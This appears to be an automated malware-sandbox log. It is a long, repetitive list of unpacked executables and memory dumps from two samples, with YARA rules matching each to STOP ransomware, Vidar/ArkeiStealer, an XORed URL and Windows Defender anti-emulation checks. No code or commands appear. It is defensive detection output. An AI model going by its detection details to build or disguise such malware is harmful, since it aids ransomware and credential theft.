Source: 8.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 17.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
